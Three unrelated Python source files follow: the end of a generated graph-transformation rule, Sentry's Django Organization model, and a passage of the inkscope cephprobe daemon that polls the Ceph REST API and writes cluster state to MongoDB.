self.vs[5]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc5')
# match association School--special-->Service node
self.add_node()
self.vs[6]["MT_subtypeMatching__"] = False
self.vs[6]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "special"
"""
self.vs[6]["MT_label__"] = """7"""
self.vs[6]["MT_subtypes__"] = []
self.vs[6]["MT_dirty__"] = False
self.vs[6]["mm__"] = """MT_pre__directLink_S"""
self.vs[6]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc6')
# Nodes that represent the apply associations of the property.
# apply association SpecialFacility--members-->Person node
self.add_node()
self.vs[7]["MT_subtypeMatching__"] = False
self.vs[7]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "members"
"""
self.vs[7]["MT_label__"] = """8"""
self.vs[7]["MT_subtypes__"] = []
self.vs[7]["MT_dirty__"] = False
self.vs[7]["mm__"] = """MT_pre__directLink_T"""
self.vs[7]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'assoc7')
# Nodes that represent trace relations
# backward association Child---->Person node
self.add_node()
self.vs[8]["MT_subtypeMatching__"] = False
self.vs[8]["MT_label__"] = """9"""
self.vs[8]["MT_subtypes__"] = []
self.vs[8]["MT_dirty__"] = False
self.vs[8]["mm__"] = """MT_pre__trace_link"""
self.vs[8]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'blink8')
# backward association School---->SpecialFacility node
self.add_node()
self.vs[9]["MT_subtypeMatching__"] = False
self.vs[9]["MT_label__"] = """10"""
self.vs[9]["MT_subtypes__"] = []
self.vs[9]["MT_dirty__"] = False
self.vs[9]["mm__"] = """MT_pre__trace_link"""
self.vs[9]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'blink9')
# Add the edges
self.add_edges([
(3,8), # apply_class Person() -> backward_association
(8,0), # backward_association -> match_class Child()
(4,9), # apply_class SpecialFacility() -> backward_association
(9,1), # backward_association -> match_class School()
(4,7), # apply_class SpecialFacility() -> association members
(7,3), # association members -> apply_class Person()
(0,5), # match_class Child() -> association goesTo
(5,1), # association goesTo -> match_class School()
(1,6), # match_class School() -> association special
(6,2) # association special -> match_class Service()
])
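# Summary of the pattern encoded by the nodes and edges above: on the match
# side, Child --goesTo--> School --special--> Service; on the apply side,
# SpecialFacility --members--> Person; trace links relate Person to Child and
# SpecialFacility to School.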
# Add the attribute equations
self["equations"] = []
def eval_attr11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr12(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr13(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr16(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "goesTo"
def eval_attr17(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "special"
def eval_attr14(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr15(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_attr18(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "members"
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function that takes a label (an integer) as parameter
and returns the node matched under that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
|
|
"""
sentry.models.organization
~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
from datetime import timedelta
from bitfield import BitField
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import IntegrityError, models, transaction
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from sentry import roles
from sentry.app import locks
from sentry.constants import RESERVED_ORGANIZATION_SLUGS
from sentry.db.models import (
BaseManager, BoundedPositiveIntegerField, Model, sane_repr
)
from sentry.db.models.utils import slugify_instance
from sentry.utils.http import absolute_uri
from sentry.utils.retries import TimedRetryPolicy
# TODO(dcramer): pull in enum library
class OrganizationStatus(object):
VISIBLE = 0
PENDING_DELETION = 1
DELETION_IN_PROGRESS = 2
class OrganizationManager(BaseManager):
# def get_by_natural_key(self, slug):
# return self.get(slug=slug)
def get_for_user(self, user, scope=None, only_visible=True):
"""
Returns a set of all organizations a user has access to.
"""
from sentry.models import OrganizationMember
if not user.is_authenticated():
return []
if settings.SENTRY_PUBLIC and scope is None:
if only_visible:
return list(self.filter(status=OrganizationStatus.VISIBLE))
else:
return list(self.filter())
qs = OrganizationMember.objects.filter(user=user).select_related('organization')
if only_visible:
qs = qs.filter(organization__status=OrganizationStatus.VISIBLE)
results = list(qs)
if scope is not None:
return [
r.organization for r in results
if scope in r.get_scopes()
]
return [r.organization for r in results]
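# Illustrative usage (a sketch; the scope string is hypothetical):
#   orgs = Organization.objects.get_for_user(request.user, scope='org:read')
# returns only the organizations in which the user's membership grants that scope.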
class Organization(Model):
"""
An organization represents a group of individuals who maintain ownership of projects.
"""
__core__ = True
name = models.CharField(max_length=64)
slug = models.SlugField(unique=True)
status = BoundedPositiveIntegerField(choices=(
(OrganizationStatus.VISIBLE, _('Visible')),
(OrganizationStatus.PENDING_DELETION, _('Pending Deletion')),
(OrganizationStatus.DELETION_IN_PROGRESS, _('Deletion in Progress')),
), default=OrganizationStatus.VISIBLE)
date_added = models.DateTimeField(default=timezone.now)
members = models.ManyToManyField(settings.AUTH_USER_MODEL, through='sentry.OrganizationMember', related_name='org_memberships')
default_role = models.CharField(
choices=roles.get_choices(),
max_length=32,
default=roles.get_default().id,
)
flags = BitField(flags=(
('allow_joinleave', 'Allow members to join and leave teams without requiring approval.'),
('enhanced_privacy', 'Enable enhanced privacy controls to limit personally identifiable information (PII) as well as source code in things like notifications.'),
('disable_shared_issues', 'Disable sharing of limited details on issues to anonymous users.'),
('early_adopter', 'Enable early adopter status, gaining access to features prior to public release.'),
), default=1)
objects = OrganizationManager(cache_fields=(
'pk',
'slug',
))
class Meta:
app_label = 'sentry'
db_table = 'sentry_organization'
__repr__ = sane_repr('owner_id', 'name', 'slug')
@classmethod
def get_default(cls):
"""
Return the organization used in single organization mode.
"""
return cls.objects.filter(
status=OrganizationStatus.VISIBLE,
)[0]
def __unicode__(self):
return u'%s (%s)' % (self.name, self.slug)
def save(self, *args, **kwargs):
if not self.slug:
lock = locks.get('slug:organization', duration=5)
with TimedRetryPolicy(10)(lock.acquire):
slugify_instance(self, self.name,
reserved=RESERVED_ORGANIZATION_SLUGS)
super(Organization, self).save(*args, **kwargs)
else:
super(Organization, self).save(*args, **kwargs)
def delete(self):
if self.is_default:
raise Exception('You cannot delete the default organization.')
return super(Organization, self).delete()
@cached_property
def is_default(self):
if not settings.SENTRY_SINGLE_ORGANIZATION:
return False
return self == type(self).get_default()
def has_access(self, user, access=None):
queryset = self.member_set.filter(user=user)
if access is not None:
queryset = queryset.filter(type__lte=access)
return queryset.exists()
def get_audit_log_data(self):
return {
'id': self.id,
'slug': self.slug,
'name': self.name,
'status': self.status,
'flags': self.flags,
'default_role': self.default_role,
}
def get_owners(self):
from sentry.models import User
return User.objects.filter(
sentry_orgmember_set__role=roles.get_top_dog().id,
sentry_orgmember_set__organization=self,
is_active=True,
)
def get_default_owner(self):
if not hasattr(self, '_default_owner'):
self._default_owner = self.get_owners()[0]
return self._default_owner
def has_single_owner(self):
from sentry.models import OrganizationMember
count = OrganizationMember.objects.filter(
organization=self,
role=roles.get_top_dog().id,
user__isnull=False,
user__is_active=True,
)[:2].count()
return count == 1
def merge_to(from_org, to_org):
from sentry.models import (
ApiKey, AuditLogEntry, Commit, OrganizationMember,
OrganizationMemberTeam, Project, Release, ReleaseCommit,
ReleaseEnvironment, ReleaseFile, ReleaseHeadCommit,
Repository, Team, Environment,
)
for from_member in OrganizationMember.objects.filter(organization=from_org, user__isnull=False):
try:
to_member = OrganizationMember.objects.get(
organization=to_org,
user=from_member.user,
)
except OrganizationMember.DoesNotExist:
from_member.update(organization=to_org)
to_member = from_member
else:
qs = OrganizationMemberTeam.objects.filter(
organizationmember=from_member,
is_active=True,
).select_related()
for omt in qs:
OrganizationMemberTeam.objects.create_or_update(
organizationmember=to_member,
team=omt.team,
defaults={
'is_active': True,
},
)
for team in Team.objects.filter(organization=from_org):
try:
with transaction.atomic():
team.update(organization=to_org)
except IntegrityError:
slugify_instance(team, team.name, organization=to_org)
team.update(
organization=to_org,
slug=team.slug,
)
for project in Project.objects.filter(organization=from_org):
try:
with transaction.atomic():
project.update(organization=to_org)
except IntegrityError:
slugify_instance(project, project.name, organization=to_org)
project.update(
organization=to_org,
slug=project.slug,
)
# TODO(jess): update this when adding unique constraint
# on version, organization for releases
for release in Release.objects.filter(organization=from_org):
try:
to_release = Release.objects.get(
version=release.version,
organization=to_org
)
except Release.DoesNotExist:
Release.objects.filter(
id=release.id
).update(organization=to_org)
else:
Release.merge(to_release, [release])
for model in (ApiKey, AuditLogEntry, ReleaseFile):
model.objects.filter(
organization=from_org,
).update(organization=to_org)
for model in (Commit, ReleaseCommit, ReleaseEnvironment,
ReleaseHeadCommit, Repository, Environment):
model.objects.filter(
organization_id=from_org.id,
).update(organization_id=to_org.id)
# TODO: Make these a mixin
def update_option(self, *args, **kwargs):
from sentry.models import OrganizationOption
return OrganizationOption.objects.set_value(self, *args, **kwargs)
def get_option(self, *args, **kwargs):
from sentry.models import OrganizationOption
return OrganizationOption.objects.get_value(self, *args, **kwargs)
def delete_option(self, *args, **kwargs):
from sentry.models import OrganizationOption
return OrganizationOption.objects.unset_value(self, *args, **kwargs)
def send_delete_confirmation(self, audit_log_entry, countdown):
from sentry import options
from sentry.utils.email import MessageBuilder
owners = self.get_owners()
context = {
'organization': self,
'audit_log_entry': audit_log_entry,
'eta': timezone.now() + timedelta(seconds=countdown),
'url': absolute_uri(reverse(
'sentry-restore-organization',
args=[self.slug],
)),
}
MessageBuilder(
subject='%sOrganization Queued for Deletion' % (options.get('mail.subject-prefix'),),
template='sentry/emails/org_delete_confirm.txt',
html_template='sentry/emails/org_delete_confirm.html',
type='org.confirm_delete',
context=context,
).send_async([o.email for o in owners])
|
|
#!/usr/bin/env python
#author Philippe Raipin
#author Eric Mourgaya
#licence : apache v2
# chkconfig: 2345 55 25
# description: Cephprobe daemon
#
# processname: cephprobe
# pidfile: /var/run/cephprobe/cephprobe.pid
### BEGIN INIT INFO
# Provides: cephprobe
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start daemon at boot time
# Description: Enable service provided by daemon.
### END INIT INFO
from pymongo import MongoClient
from pymongo import MongoReplicaSetClient
from pymongo.read_preferences import ReadPreference
import time
# for ceph command call
import subprocess
import datetime
import sys
import traceback
import os
import re
import socket
from daemon import Daemon
import json
from StringIO import StringIO
from bson.dbref import DBRef
from threading import Thread, Event
import httplib
import signal
# from bson.objectid import ObjectId
# db.col.find({"_id": ObjectId(obj_id_to_find)})
configfile = "/opt/inkscope/etc/inkscope.conf"
runfile = "/var/run/cephprobe/cephprobe.pid"
logfile = "/var/log/inkscope/cephprobe.log"
clusterName = "ceph"
fsid = ""
ceph_version = ""
# load the conf (from json into file)
def load_conf():
datasource = open(configfile, "r")
data = json.load(datasource)
datasource.close()
return data
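# Illustrative shape of /opt/inkscope/etc/inkscope.conf (a sketch: the keys
# mirror those read in CephProbeDaemon.start_probe below, values are placeholders):
# {
#     "cluster": "ceph",
#     "ceph_conf": "/etc/ceph/ceph.conf",
#     "ceph_rest_api": "127.0.0.1:5000",
#     "mongodb_host": "127.0.0.1",
#     "mongodb_port": 27017,
#     "hb_refresh": 5,
#     "status_refresh": 3
# }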
def get_ceph_version():
try:
args = ['ceph',
'--version']
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = p.communicate()
if p.returncode != 0:
return "not found"
ceph_version = re.search('[0-9]*\.[0-9]*\.[0-9]*', output)
if ceph_version:
return ceph_version.group(0)
return "not found"
except:
return '0.0.0 (could not be found on inkscope server - please consider installing Ceph on it)'
# list sections prefixed
def ceph_conf_list(prefix):
p = subprocess.Popen(
args=[
'ceph-conf',
'-l',
prefix
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if (len(errdata)):
raise RuntimeError('unable to get conf option prefix %s: %s' % (prefix, errdata))
return outdata.rstrip().splitlines()
# get a field value from named section
def ceph_conf(field, name):
p = subprocess.Popen(
args=[
'ceph-conf',
'--show-config-value',
field,
'-n',
name,
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if len(errdata):
raise RuntimeError('unable to get conf option %s for %s: %s' % (field, name, errdata))
return outdata.rstrip()
# get a field value from global conf
def ceph_conf_global(field):
p = subprocess.Popen(
args=[
'ceph-conf',
'--show-config-value',
field
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if len(errdata):
raise RuntimeError('unable to get conf option %s: %s' % (field, errdata))
return outdata.rstrip()
# get a field value from global conf according to the specified ceph conf
# (note: this two-argument definition shadows the one-argument ceph_conf_global
# above; all call sites in this file pass an explicit ceph.conf path)
def ceph_conf_global(cephConfPath, field):
p = subprocess.Popen(
args=[
'ceph-conf',
'-c',
cephConfPath,
'--show-config-value',
field
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
outdata, errdata = p.communicate()
if len(errdata):
raise RuntimeError('unable to get conf option %s: %s' % (field, errdata))
return outdata.rstrip()
# extract mons from conf and put them into mons
def process_conf(cephConfPath):
mon_sections=ceph_conf_list('mon.')
if len(mon_sections)==0:
initmon = ceph_conf_global(cephConfPath, 'mon_initial_members')
if not initmon:
raise RuntimeError('unable to find a mon')
mons = [initmon]
else:
mons = []
for mon in mon_sections:
mons.append(ceph_conf('host', mon))
# cluster
def init_cluster(restapi, ceph_rest_api_subfolder, db, hostname):
leader = leadership(db, hostname)
if isLeader or leader == None :
process_status(restapi, ceph_rest_api_subfolder, db)
process_crushmap(restapi, ceph_rest_api_subfolder, db)
process_osd_dump(restapi, ceph_rest_api_subfolder, db)
process_pg_dump(restapi, ceph_rest_api_subfolder, db)
process_df(restapi, ceph_rest_api_subfolder, db)
# health value
healthCst = ["HEALTH_OK", "HEALTH_WARN", "HEALTH_ERROR"]
healthMap = {}
for idx, h in enumerate(healthCst):
healthMap[h] = idx
def worst_health(h1, h2):
return healthCst[max(healthMap[h1], healthMap[h2])]
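# Illustrative example: worst_health("HEALTH_OK", "HEALTH_WARN") returns
# "HEALTH_WARN", since states later in healthCst are considered worse.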
def leadership(db, hostname):
global isLeader
leaderfailed = False
cpleader = db.cephprobeleader.find_one()
if cpleader :
cp = db.cephprobe.find_one({"_id": cpleader["leader"]})
if cp["timestamp"] < int(round((time.time()- (hb_refresh*2))*1000)) :
#leader failed !!
leaderfailed = True
else :
isLeader = (cpleader["leader"] == hostname) #ensure leadership
return cpleader["leader"]
else :
leaderfailed = True
cpleader = {}
if leaderfailed :
isLeader = False
# I am the new leader ?
cephprobes = db.cephprobe.find( {"timestamp": {"$gt": int(round((time.time()- (hb_refresh*2)) * 1000))}})
if cephprobes :
cpids = [p["_id"] for p in cephprobes]
cpids.sort()
if cpids and (cpids[0] == hostname) :
# yes I am the new leader
print "I'm the leader, then I work"
sys.stdout.flush()
cpleader["leader"] = hostname
db.cephprobeleader.update({}, cpleader, upsert=True)
isLeader = True
return hostname
else :
# no one !!
return None
# uri : /api/v0.1/status.json
def process_status(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process Status"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/status.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (Status) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (Status) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
return None
else:
data1 = r1.read()
restapi.close()
c_status = json.loads(data1)
monmap = c_status['output']['monmap']
map_stat_mon = {}
timecheckmap = {}
try:
time_checks = c_status['output']['health']['timechecks']
for tc in time_checks["mons"]:
tc["time_health"] = tc["health"]
del tc["health"]
monname = tc["name"]
del tc["name"]
timecheckmap[monname] = tc
except (RuntimeError, TypeError, NameError, KeyError):
pass
# complete timecheck
try:
health_services_list = c_status['output']['health']['health']['health_services']
for health_service in health_services_list:
health_services_mons = health_service['mons']
for monst in health_services_mons:
monstat = monst.copy()
monstat["mon"] = DBRef( "mon", monst['name'])
monstat["_id"] = monst['name']+":"+monst["last_updated"]
monstat["capacity_health"] = monstat["health"]
#complete with timecheck
if monstat["name"] in timecheckmap:
tc = timecheckmap[monstat["name"]]
monstat.update(tc)
monstat["health"] = worst_health(monstat["capacity_health"], monstat["time_health"])
del monstat["name"]
db.monstat.update({"_id" : monstat["_id"]}, monstat, upsert= True)
map_stat_mon[monst['name']] = monstat["_id"]
except (RuntimeError, TypeError, NameError, KeyError):
pass
map_rk_name = {}
for mon in monmap['mons']:
#find the mon host
hostaddr = mon['addr'].partition(':')[0]
monhostid = None
#if hostaddr == '': # the case if mon is declared but not completely configured
# no need to treat cause we can keep monhostid = None
if hostaddr != '':
# first lookup known hosts in db
monhost = db.hosts.find_one({"hostip": hostaddr})
if not monhost:
monneti = db.net.find_one({"$where": "this.inet.addr === '"+hostaddr+"'"})
if monneti:
monhostid = monneti["_id"].partition(":")[0]
else: # not found in db, lookup with fqdn
monhostid = socket.getfqdn(hostaddr)
else:
monhostid = monhost["_id"]
mondb = {"_id": mon['name'],
"host": DBRef( "hosts", monhostid),
"addr": mon['addr'],
"rank": mon['rank'],
}
if mon['name'] in map_stat_mon :
mondb["stat"] = DBRef("monstat", map_stat_mon[mon['name']])
db.mon.update({"_id": mon['name']}, mondb, upsert=True)
map_rk_name[mon['rank']] = mon['name']
# no skew and latency ?
mm = {"epoch": monmap['epoch'],
"created": monmap['created'],
"modified": monmap['modified'],
"mons": [DBRef( "mon", m['name']) for m in monmap['mons']],
"quorum": [DBRef( "mon", map_rk_name[rk]) for rk in c_status['output']['quorum']]
}
cluster = {"_id": c_status['output']['fsid'],
"election_epoch": c_status['output']['election_epoch'],
"monmap": mm,
"pgmap": c_status['output']['pgmap'],
"osdmap-info": c_status['output']['osdmap']['osdmap'],
"name": clusterName
}
try:
# the cluster document is a plain dict, so use item assignment
cluster["health"] = c_status['output']['health']['overall_status']
cluster["health_detail"] = c_status['output']['health']['detail']
cluster["health_summary"] = c_status['output']['health']['summary']
except Exception, e:
pass
db.cluster.update({'_id': c_status['output']['fsid']}, cluster, upsert=True)
return c_status['output']['fsid']
# uri : /api/v0.1/osd/df.json
def process_osd_df(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process OSDDF"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/osd/df.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (OSDDF) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (OSDDF) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
osd_in_db = db.osd.find({"$or": [{"lost": {'$exists': False}}, {"lost": False}]}, fields={"_id": 1})
lost_osd = list(osd_in_db)
osd_df = json.loads(data1)
osds = osd_df['output']['nodes']
for osd in osds:
osd_df = {"osd": DBRef("osd", osd["id"]),
"timestamp": int(round(time.time() * 1000)),
"kb": osd["kb"],
"type_id": osd["type_id"],
"reweight": osd["reweight"],
"crush_weight": osd["crush_weight"],
"utilization": osd["utilization"],
"depth": osd["depth"],
"kb_avail": osd["kb_avail"],
"pgs": osd["pgs"],
"kb_used": osd["kb_used"],
"device_class": osd["device_class"],
"var": osd["var"],
"type": osd["type"]
}
osd_df_id = db.osddf.insert(osd_df)
try: # try to update already existing osd
osddb = db.osd.find({"_id": osd["id"]}).next()
osddb["df"]= DBRef( "osddf", osd_df_id)
db.osd.update({'_id': osddb["_id"]}, osddb, upsert=True)
except:
pass
# uri : /api/v0.1/osd/dump.json
def process_osd_dump(restapi, ceph_rest_api_subfolder, db):
if not isLeader:
return
print str(datetime.datetime.now()), "-- Process OSDDump"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder + "/api/v0.1/osd/dump.json")
r1 = restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (OSDDump) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(
datetime.datetime.now()), "-- error (OSDDump) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
osd_in_db = db.osd.find({"$or": [{"lost": {'$exists': False}}, {"lost": False}]}, fields={"_id": 1})
lost_osd = list(osd_in_db)
osd_dump = json.loads(data1)
osdsxinfo_map = {}
for xi in osd_dump['output']['osd_xinfo']:
osdsxinfo_map[xi["osd"]] = xi
osds = osd_dump['output']['osds']
for osd in osds:
if osd["osd"] in lost_osd:
lost_osd.remove(osd["osd"])
osd_stat = {"osd": DBRef("osd", osd["osd"]),
"timestamp": int(round(time.time() * 1000)),
"weight": osd["weight"],
"up": osd["up"] == 1,
"in": osd["in"] == 1,
"last_clean_begin": osd["last_clean_begin"],
"last_clean_end": osd["last_clean_end"],
"up_from": osd["up_from"],
"up_thru": osd["up_thru"],
"down_at": osd["down_at"],
"lost_at": osd["lost_at"],
"state": osd["state"]
}
osd_stat_id = db.osdstat.insert(osd_stat)
hostaddr = osd["public_addr"].partition(':')[0]
osdhostid = None
# find host name
# if hostaddr == '': # the case if osd is declared but not completely configured
# no need to treat cause we can keep osdhostid = None
if hostaddr != '':
# first lookup known hosts in db
osdhost = db.hosts.find_one({"hostip": hostaddr})
if not osdhost:
osdneti = db.net.find_one(
{"$where": "this.inet != null && this.inet.addr === '" + hostaddr + "'"})
if osdneti:
osdhostid = osdneti["_id"].partition(":")[0]
else: # not found in db, lookup with fqdn
osdhostid = socket.getfqdn(hostaddr)
else:
osdhostid = osdhost["_id"]
osddatapartitionid = None
if osdhostid:
osddatapartition = db.partitions.find_one({"_id": {'$regex': osdhostid + ":.*"},
"mountpoint": '/var/lib/ceph/osd/' + clusterName + '-' + str(
osd["osd"])})
if osddatapartition:
osddatapartitionid = osddatapartition['_id']
osddb = {"_id": osd["osd"],
"uuid": osd["uuid"],
"node": DBRef("nodes", osd["osd"]),
"stat": DBRef("osdstat", osd_stat_id),
"public_addr": osd["public_addr"],
"cluster_addr": osd["cluster_addr"],
"heartbeat_back_addr": osd["heartbeat_back_addr"],
"heartbeat_front_addr": osd["heartbeat_front_addr"],
"down_stamp": osdsxinfo_map[osd["osd"]]["down_stamp"],
"laggy_probability": osdsxinfo_map[osd["osd"]]["laggy_probability"],
"laggy_interval": osdsxinfo_map[osd["osd"]]["laggy_interval"],
"host": DBRef("hosts", osdhostid),
"partition": DBRef("partitions", osddatapartitionid)
}
try:
osdori = db.osd.find({"_id": osd["osd"]}).next()
osddb["df"] = osdori["df"]
except:
pass
db.osd.update({'_id': osddb["_id"]}, osddb, upsert=True)
pools = osd_dump['output']['pools']
for pool in pools:
p = pool.copy()
p["_id"] = pool["pool"]
del p["pool"]
if p['auid']:
p['auid'] = str(p['auid'])
db.pools.update({'_id': p["_id"]}, p, upsert=True)
for osd in lost_osd:
db.osd.update({'_id': osd}, {"$set": {"lost": True}})
# osd host from conf : "host" : DBRef( "hosts", hostmap[i]),
# "partition" : DBRef( "partitions", hostmap[i]+":/dev/sdc1"),
# uri : /api/v0.1/pg/dump.json
def process_pg_dump(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process PGDump"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/pg/dump.json")
r1 = restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (PGDump) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (PGDump) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
pgdump = json.loads(data1)
for pg in pgdump["output"]["pg_stats"]:
# db.pg.insert(pg)
pg['_id'] = pg['pgid']
del pg['pgid']
pg['pool'] = DBRef('pools', int(pg['_id'].partition('.')[0]))
ups = pg['up']
pg['up'] = [DBRef('osd', i_osd) for i_osd in ups]
actings = pg['acting']
pg['acting'] = [DBRef('osd', i_osd) for i_osd in actings]
# Rename keys containing '.' in stat_cat_sum
# replace '.' by '_'
if 'stat_cat_sum' in pg:
scs = pg['stat_cat_sum']
else:
scs = pg['stat_sum']
for key in scs.keys():  # iterate over a copy of the keys; the dict is modified below
try:
idx = key.index('.')
value = scs[key]
del scs[key]
scs[key.replace('.', '_')] = value
except:
pass
db.pg.update({'_id' : pg["_id"]}, pg, upsert= True)
# uri : /api/v0.1/osd/crush/dump.json
def process_crushmap(restapi, ceph_rest_api_subfolder, db):
if not isLeader :
return
print str(datetime.datetime.now()), "-- Process Crushmap"
sys.stdout.flush()
try:
restapi.connect()
restapi.request("GET", ceph_rest_api_subfolder+"/api/v0.1/osd/crush/dump.json")
r1=restapi.getresponse()
except Exception, e:
print str(datetime.datetime.now()), "-- error (Crushmap) failed to connect to ceph rest api: ", e.message
restapi.close()
raise e
if r1.status != 200:
print str(datetime.datetime.now()), "-- error (Crushmap) failed to connect to ceph rest api: ", r1.status, r1.reason
restapi.close()
else:
data1 = r1.read()
restapi.close()
crush_dump = json.loads(data1)
# types
types = crush_dump['output']['types']
types_ref = []
for t in types :
db.types.update({'_id': t["name"]}, {"_id": t["name"], "num": t["type_id"]}, upsert=True)
types_ref.append(DBRef("types", t["name"]))
# nodes
nodes_ref = []
devices = crush_dump['output']['devices']
for d in devices:
db.nodes.update({'_id': d["id"]}, {"_id": d["id"], "name": d["name"], "type": DBRef("types", "osd")}, upsert=True)
nodes_ref.append(DBRef("nodes", d["id"]))
buckets = crush_dump['output']['buckets']
for b in buckets:
nod = {"_id": b["id"],
"name": b["name"],
"weight": b["weight"],
"type": DBRef("types", b["type_name"]),
"hash": b["hash"],
"alg": b["alg"],
"items": [{"item": DBRef("nodes", i["id"]), "weight": i["weight"], "pos": i["pos"]} for i in b["items"]]
}
db.nodes.update({'_id' :nod["_id"]}, nod, upsert=True)
nodes_ref.append(DBRef("nodes", nod["_id"]))
# rules
rules_ref = []
rules = crush_dump['output']['rules']
for r in rules:
steps = []
for s in r["steps"]:
st = {"op": s["op"]}
if s.has_key("item"):
st["item"] = DBRef("nodes", s["item"])
if s.has_key("num"):
st["num"] = s["num"]
if s.has_key("type"):
st["type"] = DBRef("types", s["type"])
steps.append(st)
rul = {"_id": r["rule_id"],
